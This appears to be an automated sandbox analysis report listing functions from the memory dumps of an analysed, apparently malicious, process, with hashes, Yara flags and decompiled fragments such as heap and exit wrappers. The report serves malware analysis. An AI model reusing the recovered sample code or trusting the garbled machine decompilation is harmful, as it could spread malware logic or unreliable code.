                                  • Instruction ID: a193822c77949feb60fbf0d32c102a243cba8543daa04fc293c093044813aa25
                                  • Opcode Fuzzy Hash: 0f00fa3d9b9b0431927cb1cd19135e50a84d838351a5b0e8583e99baf7685758
                                  • Instruction Fuzzy Hash: BE90026260100502D10271E95414626000AA7D0381F91C022A1014559ECAA58992B171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 2155c837ccb2e1f7bcf4475e88c4b2561e6db77cddc54dbfee94e050087d0e50
                                  • Instruction ID: 2d59d3fda6c11a8bcde7677993de1e78a2fb5bc37ff65be85b1738dbacb01fe1
                                  • Opcode Fuzzy Hash: 2155c837ccb2e1f7bcf4475e88c4b2561e6db77cddc54dbfee94e050087d0e50
                                  • Instruction Fuzzy Hash: E0900262242041525546B1E954145174006B7E0381791C012A1404954CC5A69856E661
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6da318af62f1a6e5c44dc51617e5dd157ae4666fd3d7511a87a9156458f0796a
                                  • Instruction ID: f0a9788d619fa499a24df8098ac71afaeefa3c75bccd05992adb4bd0ba6925ff
                                  • Opcode Fuzzy Hash: 6da318af62f1a6e5c44dc51617e5dd157ae4666fd3d7511a87a9156458f0796a
                                  • Instruction Fuzzy Hash: 0290027220100413D11261E955147170009A7D0381F91C412A041455CDD6D68952B161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: fdae0a9350b2503ba8d9c2c9c9af8042ca22c6c9289d40636159ca7ffb54dd18
                                  • Instruction ID: d059d3a9b874d010c7bffe16b4285c213b135979fa70c73979159174ba7dc55a
                                  • Opcode Fuzzy Hash: fdae0a9350b2503ba8d9c2c9c9af8042ca22c6c9289d40636159ca7ffb54dd18
                                  • Instruction Fuzzy Hash: 5690027220140402D10161E9582471B0005A7D0342F51C011A1154559DC6A5885175B1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 10963662d65cb2791706a7899996d6590d6777e730e089782af7cb3eb0bcda68
                                  • Instruction ID: c0af84df1a59e0efec67f39ead18261d8b71539b255b4b66e2353e3a8f893eba
                                  • Opcode Fuzzy Hash: 10963662d65cb2791706a7899996d6590d6777e730e089782af7cb3eb0bcda68
                                  • Instruction Fuzzy Hash: 5C90026260100042414171F998549164005BBE1351751C121A0988554DC5D9886566A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5504d70c0d86ec7ae530a765cd59868bf4a8b546065e21b18b3a3b611facd371
                                  • Instruction ID: 160d37e1f21a46ee3f428e9d9b455f59ce5741f83a5a9ae2ab554c7e654ecabf
                                  • Opcode Fuzzy Hash: 5504d70c0d86ec7ae530a765cd59868bf4a8b546065e21b18b3a3b611facd371
                                  • Instruction Fuzzy Hash: 4F90026221180042D20165F95C24B170005A7D0343F51C115A0144558CC99588616561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f07817e42e680f1aa6ca63adf5ddb3440f9d9fc1ee5d440d4652466238883930
                                  • Instruction ID: 5e2ad23d66ee111c0d317f961a063e8851710d8a8b9e5305f002ffc5b1c5a3e2
                                  • Opcode Fuzzy Hash: f07817e42e680f1aa6ca63adf5ddb3440f9d9fc1ee5d440d4652466238883930
                                  • Instruction Fuzzy Hash: DF9002A220200003410671E95424626400AA7E0341B51C021E1004594DC5A588917165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b1faf356e811347f4b3411d550d45ad485ef2097507fbf1cc1d9919e3d2e7652
                                  • Instruction ID: e45b557d10ddd9cbe4f27f5cf38aea613610caa482731e823639c53c7bc650dc
                                  • Opcode Fuzzy Hash: b1faf356e811347f4b3411d550d45ad485ef2097507fbf1cc1d9919e3d2e7652
                                  • Instruction Fuzzy Hash: 01900266211000030106A5E917145170046A7D5391351C021F1005554CD6A188616161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a8a9a71fd37e3fd417496c26d71cb9ee89f76686a6d863a8cafe412f29c0f9ae
                                  • Instruction ID: b1cc8118342dd9f9dd20194b1170f2a68d7b516c704298735b96774f442591d5
                                  • Opcode Fuzzy Hash: a8a9a71fd37e3fd417496c26d71cb9ee89f76686a6d863a8cafe412f29c0f9ae
                                  • Instruction Fuzzy Hash: 8490026A21300002D18171E9641861A0005A7D1342F91D415A000555CCC99588696361
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5cdb7a3a62e764c27ef6cbf306d488d42686876c451fb8b73d55825cbea883a3
                                  • Instruction ID: bf692555ab571722d9cc26524f5b47df8381e315ccfbb5f8dd48f1663b8de558
                                  • Opcode Fuzzy Hash: 5cdb7a3a62e764c27ef6cbf306d488d42686876c451fb8b73d55825cbea883a3
                                  • Instruction Fuzzy Hash: 1F90026230100003D14171E964286164005F7E1341F51D011E0404558CD99588566262
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ed7d314ae722b4f8b2e984546cb27a68117b757a3926b7643146b2efd75066d4
                                  • Instruction ID: 4c5a03726f0b260a5aed76f14e4b2f592484cd4c8cc523fe343863f15dcf570c
                                  • Opcode Fuzzy Hash: ed7d314ae722b4f8b2e984546cb27a68117b757a3926b7643146b2efd75066d4
                                  • Instruction Fuzzy Hash: 6A90027231114402D11161E994147160005A7D1341F51C411A081455CDC6D588917162
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 0d4ccaaf6d46ef1618999c91839f0bcea0ad9012ff06409872ea4e2f84bf044a
                                  • Instruction ID: d02511df6afca474226922fbdff8e567f8dd26761e8f8f986cd6dba7e59c37b6
                                  • Opcode Fuzzy Hash: 0d4ccaaf6d46ef1618999c91839f0bcea0ad9012ff06409872ea4e2f84bf044a
                                  • Instruction Fuzzy Hash: 0E90027220100402D10165E964186560005A7E0341F51D011A5014559EC6E588917171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4336a02fb66aadeaceac2257de649381015d9f3dd295f63f88ca4185623699a4
                                  • Instruction ID: 24b9040d23bc33f9aab49720623016861f35c434f06e2c14bf23f266e97b188e
                                  • Opcode Fuzzy Hash: 4336a02fb66aadeaceac2257de649381015d9f3dd295f63f88ca4185623699a4
                                  • Instruction Fuzzy Hash: 4D90027220108802D11161E9941475A0005A7D0341F55C411A441465CDC6D588917161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 26eaf7d4da8aef81873e788b386a0bc0f716fa64cdbeab8f247e2469a15f4581
                                  • Instruction ID: 325dd1950fbc5ae879922b96933072e06ab45298e082802cb1da3f9b645edf92
                                  • Opcode Fuzzy Hash: 26eaf7d4da8aef81873e788b386a0bc0f716fa64cdbeab8f247e2469a15f4581
                                  • Instruction Fuzzy Hash: C090027220100802D18171E9541465A0005A7D1341F91C015A0015658DCA958A5977E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004088D0, Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                  • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                                  • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                  • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004188B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                  0x004188c7
                                  0x004188d2
                                  0x004188dd
                                  0x004188e1

                                  APIs
                                  • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: 65A
                                  • API String ID: 1279760036-2085483392
                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00418923, Relevance: 3.0, APIs: 2, Instructions: 50memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 40%
                                  			E00418923(void* __ebx, void* __ecx, int __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				intOrPtr* _t10;
				char _t13;
				void* _t14;
				void* _t15;
				int _t17;
				void* _t20;
				void* _t23;

				_t17 = __edx;
				_t15 = __ecx;
				_t14 = __ebx;
				_pop(_t10);
				if(__eflags > 0) {
					L5:
					_t8 = _t14 + 0x68b0c55;
					 *_t8 =  *((intOrPtr*)(_t14 + 0x68b0c55)) + _t15;
					__eflags =  *_t8;
					ExitProcess(_t17);
				}
				__edx = __edx + 1;
				__eflags = __edx;
				_t4 = __ax;
				__ax = __cx;
				__cx = _t4;
				if(__edx <= 0) {
					_pop(ss);
					_push(0x6d);
					asm("loope 0xffffffc3");
					__ebp = __esp;
					__eax =  *((intOrPtr*)(__esp + 8));
					__ecx =  *((intOrPtr*)(__eax + 0xa14));
					__esi = __eax + 0xc7c;
					__eax = E004191E0(__edi, __eax, __eax + 0xc7c,  *((intOrPtr*)(__eax + 0xa14)), 0, 0x36);
					goto L5;
				}
				 *_t10 =  *_t10 + _t10;
				_push(_t10);
				E004191E0(_t20);
				_t13 = RtlFreeHeap( *(_t23 + 0xc),  *(_t23 + 0x10),  *(_t23 + 0x14)); // executed
				return _t13;
			}












                                  0x00418923
                                  0x00418923
                                  0x00418923
                                  0x00418923
                                  0x00418924
                                  0x0041894e
                                  0x0041894e
                                  0x0041894e
                                  0x0041894e
                                  0x00418958
                                  0x00418958
                                  0x00418926
                                  0x00418926
                                  0x00418927
                                  0x00418927
                                  0x00418927
                                  0x00418929
                                  0x0041892b
                                  0x0041892c
                                  0x0041892e
                                  0x00418931
                                  0x00418933
                                  0x00418936
                                  0x00418942
                                  0x0041894a
                                  0x00000000
                                  0x0041894a
                                  0x00418903
                                  0x00418906
                                  0x00418907
                                  0x0041891d
                                  0x00418921

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ExitFreeHeapProcess
                                  • String ID:
                                  • API String ID: 1180424539-0
                                  • Opcode ID: f4c07f08e70274fe5969a5ba238bd53d72c6937873ebf5ecc56d9da218e84072
                                  • Instruction ID: 2ca7b805f7778705d74f9d09f1563c9da4ba412d0acfcda959870e8aed924cc8
                                  • Opcode Fuzzy Hash: f4c07f08e70274fe5969a5ba238bd53d72c6937873ebf5ecc56d9da218e84072
                                  • Instruction Fuzzy Hash: 7601B1B52043057BD721DF58DC96FE77758EF84760F04409AF9485B242D930EE50CAE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004188E2, Relevance: 3.0, APIs: 2, Instructions: 35memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ExitFreeHeapProcess
                                  • String ID:
                                  • API String ID: 1180424539-0
                                  • Opcode ID: b15be104c320dfa4f44ef67500cef52cc1af5f29270f7141fdfe4c962698c0c7
                                  • Instruction ID: 5bd50c8c3eb33e5b96021e555d33704aa5d1df429cc087b465dd648f0bfa85b0
                                  • Opcode Fuzzy Hash: b15be104c320dfa4f44ef67500cef52cc1af5f29270f7141fdfe4c962698c0c7
                                  • Instruction Fuzzy Hash: 87F0E2B52002147BCB15DF58CC49EE7379CEF48740F154599F9086B242C630E940CAF1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                  • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                                  • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                  • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00418A43, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 0a07abca213fd1898abc626acc5bd91f107e72fdd67c15d3a60637870484657c
                                  • Instruction ID: a1270247ef26ae8ef761aa800b0d1d2d5b176ed9c01364dbca8af8c15f65e25b
                                  • Opcode Fuzzy Hash: 0a07abca213fd1898abc626acc5bd91f107e72fdd67c15d3a60637870484657c
                                  • Instruction Fuzzy Hash: 85E0E5752142906FCB11CB69DC45E973FA8DF45240F044599FD8857203C4349414C7B4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004188F0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00418A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00418930, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                  Download Yara Rule
                                  APIs
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 507835f10f86ebdd6881e70f52d66418c2c0240527aaae3c3f42fabdd21846cc
                                  • Instruction ID: 3dc618a01314889426264bb6c9ac2b859e336cf6a60cc202143a3858cca502b4
                                  • Opcode Fuzzy Hash: 507835f10f86ebdd6881e70f52d66418c2c0240527aaae3c3f42fabdd21846cc
                                  • Instruction Fuzzy Hash: D8B09B729014C5D5D612D7F556087277A047BD0745F16C055E2060645B8778C091F6B5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 01A6B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                  Download Yara Rule
                                  Strings
                                  • write to, xrefs: 01A6B4A6
                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01A6B476
                                  • *** An Access Violation occurred in %ws:%s, xrefs: 01A6B48F
                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01A6B323
                                  • a NULL pointer, xrefs: 01A6B4E0
                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 01A6B352
                                  • Go determine why that thread has not released the critical section., xrefs: 01A6B3C5
                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01A6B39B
                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01A6B38F
                                  • read from, xrefs: 01A6B4AD, 01A6B4B2
                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01A6B47D
                                  • an invalid address, %p, xrefs: 01A6B4CF
                                  • <unknown>, xrefs: 01A6B27E, 01A6B2D1, 01A6B350, 01A6B399, 01A6B417, 01A6B48E
                                  • The resource is owned exclusively by thread %p, xrefs: 01A6B374
                                  • The instruction at %p referenced memory at %p., xrefs: 01A6B432
                                  • The instruction at %p tried to %s , xrefs: 01A6B4B6
                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01A6B53F
                                  • *** Inpage error in %ws:%s, xrefs: 01A6B418
                                  • The critical section is owned by thread %p., xrefs: 01A6B3B9
                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01A6B2F3
                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01A6B314
                                  • *** enter .cxr %p for the context, xrefs: 01A6B50D
                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01A6B3D6
                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01A6B484
                                  • *** enter .exr %p for the exception record, xrefs: 01A6B4F1
                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01A6B305
                                  • This failed because of error %Ix., xrefs: 01A6B446
                                  • The resource is owned shared by %d threads, xrefs: 01A6B37E
                                  • *** then kb to get the faulting stack, xrefs: 01A6B51C
                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01A6B2DC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                  • API String ID: 0-108210295
                                  • Opcode ID: 74e8d8c09387ae45d817180364dd580062d36c5a89bacbdafec6e876159000fe
                                  • Instruction ID: 70b07211398b18a29347a66512345b1929fd11aec028673fbcd9aef0b9ef373c
                                  • Opcode Fuzzy Hash: 74e8d8c09387ae45d817180364dd580062d36c5a89bacbdafec6e876159000fe
                                  • Instruction Fuzzy Hash: 79811675B40210FFDB22AB5ACC49DBB3F79EF96A51F840058F608AB912D3618542C7F2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01A71C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 44%
                                  			E01A71C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x19948a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E019BB150();
				} else {
					E019BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x1aa589c);
				E019BB150("Heap error detected at %p (heap handle %p)\n",  *0x1aa58a0);
				_t27 =  *0x1aa5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01A71E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
